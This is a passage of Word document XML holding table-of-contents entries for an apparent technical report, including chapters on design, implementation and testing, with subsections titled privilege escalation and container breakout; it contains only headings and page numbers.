            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859284" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.6 RESEARCH DESIGN</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859284 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64E150DB" w14:textId="766420C2" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859285" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.7 DELIVERABLES</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859285 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32E7C344" w14:textId="5D9FBD84" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859286" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.8 RISKS &amp; LIMITATIONS</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859286 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="003ADC27" w14:textId="4F2923DB" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859287" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.9 RESOURCES AND PLANNING</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859287 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D1C6C7A" w14:textId="27966165" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859288"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_Toc86859288 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="767A79E2" w14:textId="2CDA87D7" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859289" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 5</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> - DESIGN AND IMPLEMENTATION</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859289 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53A2BB2D" w14:textId="19381CAD" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859290"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_Toc86859290 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24F392BA" w14:textId="78930593" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859291" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 PROBLEM FORMULATION</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859291 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F50BA32" w14:textId="4B77F3A9" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859292" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 DESIGN</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859292 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4703D4B9" w14:textId="0090711A" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859293" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 IMPLEMENTATION</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859293 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79049EC3" w14:textId="566EB41F" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859294"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_Toc86859294 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="414B8BB6" w14:textId="01E89FC5" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859295" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:bidi="x-none"/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>CHAPTER 6</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> -TESTING AND EXPERIMENTING</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859295 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A3B9C1D" w14:textId="5D4D4786" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859296"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_Toc86859296 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BE0B397" w14:textId="65722CFD" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859297" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.1</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Privilege Escalation Attack</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859297 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="66568464" w14:textId="0BF91804" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859298" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Container breakout</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc86859298 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r w:rsidR="00E54087">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2021D6AF" w14:textId="0182BAF7" w:rsidR="00E54087" w:rsidRDefault="009860F6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc86859299" w:history="1">
            <w:r w:rsidR="00E54087" w:rsidRPr="009A79F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1.3</w:t>
